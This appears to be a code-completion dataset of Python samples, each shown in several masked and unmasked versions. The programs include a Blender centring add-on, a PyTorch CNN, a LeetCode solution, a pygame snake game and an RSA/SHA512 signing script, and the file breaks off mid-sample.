"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
<mask token>
| <mask token>
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
<mask token>
| <mask token>
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
if __name__ == '__main__':
register()
| <mask token>
bl_info = {'name': 'Ratchets Center All Objects', 'author': 'Ratchet3789',
'version': (0, 1, 0), 'description':
'Centers all selected objects. Built for Game Development.', 'category':
'Object'}
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script"""
bl_idname = 'object.center_all_in_level'
bl_label = 'Center Origin (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.location = 0, 0, 0
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.snap_to_origin'
bl_label = 'Center Mesh (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = 'object.absolute_center_all_in_level'
bl_label = 'Center All (Zero)'
bl_options = {'REGISTER', 'UNDO'}
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')
x.location = 0, 0, 0
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
if __name__ == '__main__':
register()
| import bpy
bl_info = {
"name": "Ratchets Center All Objects",
"author": "Ratchet3789",
"version": (0, 1, 0),
"description": "Centers all selected objects. Built for Game Development.",
"category": "Object",
}
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "object.center_all_in_level" # unique identifier for buttons and menu items to reference.
bl_label = "Center Origin (Zero)" # display name in the interface.
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
# execute() is called by blender when running the operator.
def execute(self, context):
# The original script
for x in bpy.context.selected_objects:
x.location = (0, 0, 0)
# this lets blender know the operator finished successfully.
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.snap_to_origin"
bl_label = "Center Mesh (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.absolute_center_all_in_level"
bl_label = "Center All (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
x.location = (0, 0, 0)
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
# This allows you to run the script directly from blenders text editor
# to test the addon without having to install it.
if __name__ == "__main__":
register()
| [
10,
14,
15,
16,
18
] |
1,655 | ad63beedc460b3d64a51d0b1f81f8e44cb559749 | <mask token>
class NET(nn.Module):
<mask token>
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| <mask token>
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| <mask token>
device = torch.device(0)
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| import torch, cv2, os, time
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
device = torch.device(0)
class NET(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 64, 5)
self.conv2 = nn.Conv2d(64, 128, 5)
self.conv3 = nn.Conv2d(128, 64, 5)
x = torch.randn(86, 86).view(-1, 1, 86, 86)
self.boyut = None
self.uzunluk(x)
self.fkl1 = nn.Linear(self.boyut, 512)
self.fkl2 = nn.Linear(512, 3)
def uzunluk(self, x):
x = F.max_pool2d(F.relu(self.conv1(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv2(x)), (2, 2))
x = F.max_pool2d(F.relu(self.conv3(x)), (2, 2))
if self.boyut is None:
self.boyut = x[0].shape[0] * x[0].shape[1] * x[0].shape[2]
return x
def forward(self, x):
x = self.uzunluk(x)
x = x.view(-1, self.boyut)
x = F.relu(self.fkl1(x))
x = F.softmax(self.fkl2(x))
return x
| import torch,cv2,os,time
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
# GPU kullanımı
device=torch.device(0)
class NET(nn.Module):
def __init__(self):
super(). __init__()
self.conv1=nn.Conv2d(1,64,5)
self.conv2=nn.Conv2d(64,128,5)
self.conv3=nn.Conv2d(128,64,5)
x=torch.randn(86,86).view(-1,1,86,86)
self.boyut=None
self.uzunluk(x)
self.fkl1=nn.Linear(self.boyut,512)
self.fkl2=nn.Linear(512,3)
def uzunluk(self,x):
x=F.max_pool2d(F.relu(self.conv1(x)),(2,2))
x=F.max_pool2d(F.relu(self.conv2(x)),(2,2))
x=F.max_pool2d(F.relu(self.conv3(x)),(2,2))
if self.boyut is None:
self.boyut=x[0].shape[0]*x[0].shape[1]*x[0].shape[2]
return x
def forward(self,x):
x=self.uzunluk(x)
x=x.view(-1,self.boyut)
x=F.relu(self.fkl1(x))
x=F.softmax(self.fkl2(x))
return x
| [
3,
4,
5,
6,
7
] |
1,656 | 0212382b5c8cc1e98142a784fd26efd577ebceaf | <mask token>
| <mask token>
class Solution:
<mask token>
| <mask token>
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| from typing import List
from 二维差分模板 import DiffMatrix
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) ->int:
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([([0] * col) for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| # LCP 74. 最强祝福力场-离散化+二维差分
# https://leetcode.cn/problems/xepqZ5/
# forceField[i] = [x,y,side] 表示第 i 片力场将覆盖以坐标 (x,y) 为中心,边长为 side 的正方形区域。
# !若任意一点的 力场强度 等于覆盖该点的力场数量,请求出在这片地带中 力场强度 最强处的 力场强度。
# !统计所有左下和右上坐标,由于会出现 0.5可以将坐标乘 2。
# O(n^2)
from typing import List
from 二维差分模板 import DiffMatrix
class Solution:
def fieldOfGreatestBlessing(self, forceField: List[List[int]]) -> int:
# 离散化
allX, allY = set(), set()
for x, y, side in forceField:
allX.add(2 * x - side)
allX.add(2 * x + side)
allY.add(2 * y - side)
allY.add(2 * y + side)
sortedX = sorted(allX)
sortedY = sorted(allY)
rankX = {x: i for i, x in enumerate(sortedX)}
rankY = {y: i for i, y in enumerate(sortedY)}
# 二维差分
row, col = len(sortedX), len(sortedY)
diffMatrix = DiffMatrix([[0] * col for _ in range(row)])
for x, y, side in forceField:
r1, c1 = rankX[2 * x - side], rankY[2 * y - side]
r2, c2 = rankX[2 * x + side], rankY[2 * y + side]
diffMatrix.add(r1, c1, r2, c2, 1)
diffMatrix.update()
res = 0
for i in range(row):
for j in range(col):
res = max(res, diffMatrix.query(i, j))
return res
| [
0,
1,
2,
3,
4
] |
1,657 | ffcd3c0086ff73eb722d867b335df23382615d20 | <mask token>
| <mask token>
print(
'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'
.format(salario, novo))
| salario = float(input('Qual o valor do seu Salario atual? R$ '))
novo = salario + salario * 15 / 100
print(
'Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'
.format(salario, novo))
| salario = float(input('Qual o valor do seu Salario atual? R$ '))
novo = salario + (salario * 15 / 100)
print('Um funcioario que ganhava R$ {:.2f} com o aumento de 15% passa a ganhar R$ {:.2f}'.format(salario, novo)) | null | [
0,
1,
2,
3
] |
1,658 | d28e517e72c3689e973a5b1255d414648de418fb | <mask token>
| <mask token>
__all__ = ['CountEncoder', 'CombinCountEncoder', 'FrequencyEncoder',
'NullCounter', 'AutoCalcEncoder', 'extract_obj_cols']
| from CategoryReplacer.CategoryReplcaers import CountEncoder
from CategoryReplacer.CategoryReplcaers import CombinCountEncoder
from CategoryReplacer.CategoryReplcaers import FrequencyEncoder
from CategoryReplacer.CategoryReplcaers import NullCounter
from CategoryReplacer.CategoryReplcaers import AutoCalcEncoder
from CategoryReplacer.CategoryReplcaers import extract_obj_cols
__all__ = ['CountEncoder', 'CombinCountEncoder', 'FrequencyEncoder',
'NullCounter', 'AutoCalcEncoder', 'extract_obj_cols']
| from CategoryReplacer.CategoryReplcaers import CountEncoder
from CategoryReplacer.CategoryReplcaers import CombinCountEncoder
from CategoryReplacer.CategoryReplcaers import FrequencyEncoder
from CategoryReplacer.CategoryReplcaers import NullCounter
from CategoryReplacer.CategoryReplcaers import AutoCalcEncoder
from CategoryReplacer.CategoryReplcaers import extract_obj_cols
__all__ = [
"CountEncoder",
"CombinCountEncoder",
"FrequencyEncoder",
"NullCounter",
"AutoCalcEncoder",
"extract_obj_cols"
] | null | [
0,
1,
2,
3
] |
1,659 | 2b14607aa2527f5da57284917d06ea60e89f784c | <mask token>
class GAME:
<mask token>
<mask token>
<mask token>
<mask token>
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
<mask token>
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
<mask token>
<mask token>
<mask token>
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
def __init__(self, mode) ->None:
self.playing = 0
self.mode = mode
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1, -1), Vector2(-1, -1), Vector2(-1, -1)]
self.game_timer = 0
self.game_over = False
def refresh(self, mode):
self.__init__(mode)
return 1, 1
<mask token>
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| <mask token>
class GAME:
def __init__(self, mode) ->None:
self.playing = 0
self.mode = mode
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1, -1), Vector2(-1, -1), Vector2(-1, -1)]
self.game_timer = 0
self.game_over = False
def refresh(self, mode):
self.__init__(mode)
return 1, 1
def update(self):
self.snake.move_snake()
self.check_collision()
self.check_fail()
self.rem_rockets()
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect
):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1:
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0
].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:]:
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x,
self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1
| import pygame
from .Coin import Coin
from .Snake import Snake, Block
from .Bomb import Bomb
from .Rocket import Rocket
from pygame.math import Vector2
cell_size = 16
cell_number = 30
sprite_cell = pygame.image.load("Assets/Cell.png")
bg = pygame.image.load("Assets/BG.png")
bg2 = pygame.image.load("Assets/BG2.png")
class GAME():
def __init__(self, mode) -> None:
self.playing = 0
self.mode = mode
# Classic mode
# Colorfull mode with assets etc
self.coin = Coin(self.mode)
self.moving_coin = pygame.sprite.Group()
self.moving_coin.add(self.coin)
self.snake = Snake(self.mode)
self.bombs = [Bomb(self.mode)]
self.rockets = []
self.condition = 4
self.crowd = 2
self.count = 0
self.anim_pos = [Vector2(-1,-1), Vector2(-1,-1), Vector2(-1,-1)]
self.game_timer = 0
self.game_over = False
# self.acc = 0.1
# self.difficulty = 0
def refresh(self, mode):
self.__init__(mode)
return 1, 1
def update(self):
self.snake.move_snake()
self.check_collision()
self.check_fail()
self.rem_rockets()
def rem_rockets(self):
for rocket in self.rockets:
if not rocket.out_of_frame():
self.rockets.remove(rocket)
def check_timer(self):
if self.count >= self.crowd:
self.game_timer += 1
if self.game_timer > 50:
self.game_timer = 0
self.rockets.append(Rocket(self.mode))
def draw_elements(self, screen):
if self.mode == 0:
screen.blit(bg, (0, 0))
elif self.mode == 1:
screen.fill((155, 199, 167))
self.coin.draw_coin(screen)
self.snake.draw_snake(screen)
self.check_timer()
if self.count >= self.condition:
self.bombs.insert(0, Bomb(self.mode))
self.condition = self.condition * 2
for rocket in self.rockets:
rocket.draw_rocket(screen)
for bomb in self.bombs:
bomb.draw_bomb(screen)
def check_position(self):
for bomb in self.bombs:
if self.coin.position != bomb.position:
self.coin.randomize()
else:
self.check_position()
def check_collision(self):
if self.coin.position == self.snake.body[0]:
self.count += 1
self.check_position()
self.snake.add_block()
for rocket in self.rockets:
for i, block in enumerate(self.snake.body[:-1]):
if rocket.rocket_rect.colliderect(Block(block.x, block.y).rect):
self.snake.remove_block(i)
self.anim_pos[0] = Vector2(block.x, block.y)
for bomb in self.bombs:
if bomb.bomb_rect.colliderect(rocket.small_rect):
self.anim_pos[1] = bomb.position
if len(self.bombs) > 1 :
self.bombs.remove(bomb)
else:
bomb.randomize()
if rocket.rocket_rect.colliderect(self.coin.coin_rect):
self.anim_pos[2] = Vector2(self.coin.x, self.coin.y)
self.coin.randomize()
def check_fail(self):
if not 0 <= self.snake.body[0].x < cell_number or not 0 <= self.snake.body[0].y < cell_number:
self.game_over = 1
for block in self.snake.body[1:] :
if block == self.snake.body[0]:
self.game_over = 1
for rocket in self.rockets:
if rocket.rocket_rect.colliderect(Block(self.snake.body[0].x, self.snake.body[0].y).rect):
self.game_over = 1
for bomb in self.bombs:
if bomb.position == self.snake.body[0]:
self.game_over = 1 | [
5,
7,
9,
10,
13
] |
1,660 | da696961fea72e1482beae73c19b042b94d93886 | <mask token>
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
<mask token>
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
<mask token>
| <mask token>
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| <mask token>
fileDir = os.path.dirname(os.path.realpath('__file__'))
def ask_user(prompt, command):
root = Tkinter.Tk()
var = tkSimpleDialog.askstring(str(prompt), str(command))
return var
def read_file_line(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_key_file(key_name):
filename = os.path.join(fileDir, str(key_name))
with open(filename, 'r') as f:
read_data = f.readline()
return read_data
def read_file_all(file_name):
filename = os.path.join(fileDir, str(file_name))
with open(filename, 'r') as f:
read_data = f.readlines()
return read_data
def pop_window(title, message):
tkMessageBox.showinfo(title, message)
def select_file():
Tk().withdraw()
filename = askopenfilename()
return filename
def hash_sha512(message):
h = SHA512.new()
h.update(str(message))
signature = h.hexdigest()
return signature
def main():
decision = ask_user('DECIDE', 'RSA: type 1 to add file or type 2 to verify'
)
if decision == str(1):
execfile('RSAencr.py')
elif decision == str(2):
execfile('RSAdecr.py')
else:
exit(4)
main()
| from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
from Tkinter import Tk
from tkFileDialog import askopenfilename
import ast
import os
import tkMessageBox
from Tkinter import Tk
from tkFileDialog import askopenfilename
import Tkinter
import tkSimpleDialog
import tkMessageBox
from Crypto.Hash import SHA512
from Crypto.PublicKey import RSA
from Crypto import Random
from collections import Counter
